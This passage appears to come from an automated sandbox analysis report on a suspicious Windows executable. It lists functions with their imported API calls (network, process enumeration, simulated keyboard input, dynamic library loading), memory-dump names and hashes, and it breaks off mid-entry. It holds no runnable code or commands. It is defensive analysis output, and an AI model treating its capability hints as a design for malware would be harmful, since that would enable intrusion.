Opcode Fuzzy Hash: 9d631b409b72dc16789edb0ad8e091fb1f9f1d2362d8f0f21b849f1d793f88a0
Instruction Fuzzy Hash: FEE0EDA1A17B0691EF19AB14EC1437863E0FB19F58FC90435D91D553A8EF7CE698C710

Function 00007FF7A52132F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF7A521330B
GetProcAddress.KERNEL32 ref: 00007FF7A5213323

Strings

kernel32.dll, xrefs: 00007FF7A5213304
GetNativeSystemInfo, xrefs: 00007FF7A5213319

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
Instruction ID: 6db189487928a2d1d289601d21182e057acd4a9d8cb585a475c92dec63cd7a40
Opcode Fuzzy Hash: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
Instruction Fuzzy Hash: D2E0EDA1A17B0281EF19AB14FC1836463E1FB29F48FC50435C91D453A8EFBCE5A4C350

Function 00007FF7A520B7E4 Relevance: 6.3, APIs: 4, Instructions: 299COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
Instruction ID: 21acc3ee401afd060ea119b7faed911c79edf332fdf150fe2cb0946899e752cc
Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
Instruction Fuzzy Hash: 68D10CA6B05B5586EB14AF26C8942AD77B0FB49F88B528432DF4D47BACDF39D844C310

Function 00007FF7A52379D8 Relevance: 6.3, APIs: 4, Instructions: 282COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00007FF7A5237A72

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
Instruction ID: 62ef17397b11a70ba44226ab0d63ba52aa73b117a975ba7fe8dbb60866118446
Opcode Fuzzy Hash: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
Instruction Fuzzy Hash: F0D17EB6B06B419AEB11EB61D8801EC7371FB45B98B820436DE0D57BADDF38D515C3A0

Function 00007FF7A524D88C Relevance: 6.1, APIs: 4, Instructions: 134windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?,?,?,?,?,?,?,?,00007FF7A522BCA6), ref: 00007FF7A524D91A
ScreenToClient.USER32 ref: 00007FF7A524D947
MoveWindow.USER32 ref: 00007FF7A524D9C5
SendMessageW.USER32 ref: 00007FF7A524DA2D

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$ClientMessageMoveRectScreenSend
String ID:
API String ID: 1249313431-0
Opcode ID: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
Instruction ID: 15d6a137047a3d5973684fbbb33d8611498bb3fce1a03f86bfe794a06c6ce8dc
Opcode Fuzzy Hash: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
Instruction Fuzzy Hash: 3551D276A0665286EB10DF25D8805BD7761FB85F98F924135DE2D837E8CF39E841C310

Function 00007FF7A521BAB8 Relevance: 6.1, APIs: 4, Instructions: 127COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 00007FF7A521BB6F
GetLastError.KERNEL32 ref: 00007FF7A521BB7E
CreateDirectoryW.KERNEL32 ref: 00007FF7A521BB8E
CreateDirectoryW.KERNEL32 ref: 00007FF7A521BC27

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
Instruction ID: 7a679b5180994447c3739d448b061b9ba9b30e1f796c73ae21dcab9d58793e9a
Opcode Fuzzy Hash: 885fddea0d2d34b219ca6ab898c8b75d575591909594024e161a1fcc4b4d8134
Instruction Fuzzy Hash: D751BDB2B06A1189EB50AB22DD405ADA3B5BB56F94F964131DE0D53BECDF3CD642C320

Function 00007FF7A52343C8 Relevance: 6.1, APIs: 4, Instructions: 126networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32 ref: 00007FF7A5234414
WSAGetLastError.WSOCK32 ref: 00007FF7A5234423
#21.WSOCK32 ref: 00007FF7A52344AD
WSAGetLastError.WSOCK32 ref: 00007FF7A52344B7

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
Instruction ID: 8b0d1775e1b352fc9890ccc04f784b8d43abbbaf472ec2f761bb24a98a77c742
Opcode Fuzzy Hash: 2f7cf8263c41ad3ca56e1a8fad4cf6ea685e9961862279cbfea50359dc3cc1a2
Instruction Fuzzy Hash: B841C161B0A68285DB15BF22E844679A790BB8AFE4F864534DF1E0B7FACF3CD0018750

Function 00007FF7A5225DA4 Relevance: 6.1, APIs: 4, Instructions: 108fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32 ref: 00007FF7A5225E75
GetLastError.KERNEL32 ref: 00007FF7A5225E98
DeleteFileW.KERNEL32 ref: 00007FF7A5225EC1
CreateHardLinkW.KERNEL32 ref: 00007FF7A5225EFA

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
Instruction ID: ebc763f6309bdf7bada64bbee084ae1543155749624014aafdee643fa337f7dc
Opcode Fuzzy Hash: f222de675bb5cfeccc39e8564db9bf58fcd79be7e0b29fca596ca30ba57e565e
Instruction Fuzzy Hash: DC41CD66B09B4681DB15EF26E89107DA360FB99FD0B899431DF4E4B77ADE3CE4408350

Function 00007FF7A524F014 Relevance: 6.1, APIs: 4, Instructions: 107windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(00000000,?,?,?,?,00007FF7A5250BC9), ref: 00007FF7A524F054
GetWindowRect.USER32(?,?,?,?,00007FF7A5250BC9), ref: 00007FF7A524F0E3
PtInRect.USER32 ref: 00007FF7A524F0F3
MessageBeep.USER32(?,?,?,?,00007FF7A5250BC9), ref: 00007FF7A524F165

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
Instruction ID: 682c7d1bdff151108da8fca739c0b1c2398b80b5d2fe0e760dc3ccfb6d728b0b
Opcode Fuzzy Hash: 2f09a68d55c04cb191ca289c596e56cd55ceee8682779a4dba9d7602fe5484e5
Instruction Fuzzy Hash: 9F416E76A0AA4686EB10AF55DC84179B3A0FB85F94F964135DA1D473B8DF38E441C720

Function 00007FF7A524AA04 Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 00007FF7A524AAF2
IsMenu.USER32 ref: 00007FF7A524AB10
InsertMenuItemW.USER32 ref: 00007FF7A524AB61
DrawMenuBar.USER32 ref: 00007FF7A524AB76

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID:
API String ID: 3076010158-0
Opcode ID: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
Instruction ID: 2a31de60db53d582cedc7d931ffe80149137490c74cab6effbd66942e13faea8
Opcode Fuzzy Hash: 770ae648199355dfd02d8249b0e6024aefb4e9674bbaddc28923590af2170785
Instruction Fuzzy Hash: 7F41BC76B02A4586EB10DF66D8402AD77B2FB55F94F92403ACE0D137A8CF38E885C760

Function 00007FF7A51DC72C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51DC77F
WideCharToMultiByte.KERNEL32 ref: 00007FF7A51DC851
GetLastError.KERNEL32 ref: 00007FF7A51DC874
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7A51DC8A6

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
Instruction ID: d15a4f38468523c8ff6a5b76354639cbf9af729d328704fea88f6e037c4fcef8
Opcode Fuzzy Hash: a9867840faaecfdaa354c38ff02ada8b7424d64697801e09ff4ff5a4409c6d4e
Instruction Fuzzy Hash: AD41983390B74286FBA3BB14F044379E291AF52F94F964531DA4906AEEDF3CD4428710

Function 00007FF7A521BE00 Relevance: 6.1, APIs: 4, Instructions: 101processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7A521BE3B
Process32FirstW.KERNEL32 ref: 00007FF7A521BE4B
CloseHandle.KERNEL32 ref: 00007FF7A521BF55

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
String ID:
API String ID: 1083639309-0
Opcode ID: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
Instruction ID: 24bd207759bcd02cbea378d0d3a625d2c7260e7990e38d7a0d08041d8ab27c95
Opcode Fuzzy Hash: 02ce357f99ea2512f20365e7a5c976855fb5bc5f8675b646551cc21f1f11311e
Instruction Fuzzy Hash: 41416172A1AA8292E711FB61E8445BEA370FB95F84FD64032EB4D036A9DF7CD505C710

Function 00007FF7A5218B38 Relevance: 6.1, APIs: 4, Instructions: 96keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32 ref: 00007FF7A5218B98
SetKeyboardState.USER32 ref: 00007FF7A5218BB0
PostMessageW.USER32 ref: 00007FF7A5218C21
SendInput.USER32 ref: 00007FF7A5218C80

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
Instruction ID: 7fe1c8d95ae594f0db296edb9e7e6722aed7399e9d09f4c555ea1fe8fbfe0ff1
Opcode Fuzzy Hash: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
Instruction Fuzzy Hash: D5411BF3A0E64291F734AB219C9067BE6A0FB56F90F960131D68A136FDCE3DD5818710

Function 00007FF7A524C580 Relevance: 6.1, APIs: 4, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32 ref: 00007FF7A524C630
GetWindowLongW.USER32 ref: 00007FF7A524C658
SetWindowLongPtrW.USER32 ref: 00007FF7A524C66D
InvalidateRect.USER32(?,00000000,?,00007FF7A51EDF79), ref: 00007FF7A524C6A4

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
Instruction ID: 17126aee4fc7f6c517d1a7a2e97a78c8333fa22542f6e6d8c61d84b6a06afa26
Opcode Fuzzy Hash: 41522454ef5ffe58f3c47094a62836e99305b084494bc2ef8d406c22aeaeab5d
Instruction Fuzzy Hash: 0D4193B1E0A54685F764AB19D8403F8A371EBC6F54F969132D60D137FACE2CE8818720

Function 00007FF7A5218CAC Relevance: 6.1, APIs: 4, Instructions: 89keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32 ref: 00007FF7A5218D11
SetKeyboardState.USER32 ref: 00007FF7A5218D29
PostMessageW.USER32 ref: 00007FF7A5218D89
SendInput.USER32 ref: 00007FF7A5218DEC

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
Instruction ID: 2db67e0e753257c2675183f81a2c9b49cb89fcaee1dc3a5ae91f25b59319fd78
Opcode Fuzzy Hash: 5e46c45bdab3a47586a9f1d6f3cf12586a4e74534b52d5ecd50e7167bd5190cf
Instruction Fuzzy Hash: 2D31F2B2A0A78156E730AB319C406BAEBA0FB66F94F960135DA89037E9CF3CD541C350

Function 00007FF7A522D7DC Relevance: 6.1, APIs: 4, Instructions: 82networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET ref: 00007FF7A522D843

Part of subcall function 00007FF7A522D914: InternetOpenUrlW.WININET ref: 00007FF7A522D954
Part of subcall function 00007FF7A522D914: InternetCloseHandle.WININET ref: 00007FF7A522DA38

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
Instruction ID: 96be8c2467cfda8f2808d9eeca37c1a1712f26ba1ede0e370dbe5eda3aecf4e5
Opcode Fuzzy Hash: 9c6a6dce98b363ecdfbcced4837c14e9bd6a16cec9fa7559d6c8d26d8fbc25c1
Instruction Fuzzy Hash: 9D3191BAB0A74282F724AB16E85077DA350FB56F84F850135EA4D07F98DE3CE0468B11

Function 00007FF7A51E3D98 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7A51DA27B,?,?,?,00007FF7A51DA236), ref: 00007FF7A51E3DB1
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7A51DA27B,?,?,?,00007FF7A51DA236), ref: 00007FF7A51E3E13
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7A51DA27B,?,?,?,00007FF7A51DA236), ref: 00007FF7A51E3E4D
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7A51DA27B,?,?,?,00007FF7A51DA236), ref: 00007FF7A51E3E77

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: 25a861fe2411cd7b7e0da0a01173a2db480df9a66baf5c5800189b1476d27112
Instruction ID: c3b49cdb3c9ffb97c71f11b26263deb0d62fc4779e256e58238bbf0319cac24a
Opcode Fuzzy Hash: 25a861fe2411cd7b7e0da0a01173a2db480df9a66baf5c5800189b1476d27112
Instruction Fuzzy Hash: C5216D21B1A791C2E625AF12B440039F6A5BB55FD0B8D4134DE8E23BE8DF3CE4528710

Function 00007FF7A524F8A8 Relevance: 6.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF7A524F90E
SetWindowLongPtrW.USER32(?,?,?,?,?,?,?,00007FF7A522CD60), ref: 00007FF7A524F937
SetWindowLongPtrW.USER32(?,?,?,?,?,?,?,00007FF7A522CD60), ref: 00007FF7A524F952
SetWindowPos.USER32 ref: 00007FF7A524F988

Part of subcall function 00007FF7A51A2A54: GetWindowLongPtrW.USER32 ref: 00007FF7A51A2A71

Memory Dump Source

Source File: 0000000F.00000002.1641783870.00007FF7A51A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7A51A0000, based on PE: true

Associated: 0000000F.00000002.1641763702.00007FF7A51A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5255000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641856874.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641929453.00007FF7A528A000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.1641986431.00007FF7A5294000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff7a51a0000_qJXhXwR.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
Instruction ID: 8c8915d239769fcb32a5fb5491649e43ea5bfc97549d03928b87d093d6506e35
Opcode Fuzzy Hash: 17af9f186f091bf577d3b0a8bd6a034cb4dd905415e59c2f23c9277c7aa4b264
Instruction Fuzzy Hash: A721A4B1A09B4185EA50AB659C84639B7A0EFC6FA4F964231DE6D477F8DF3CE441C310

Function 00007FF7A525108C Relevance: 6.1, APIs: 4, Instructions: 71windowCOMMON

Download Yara Rule

APIs

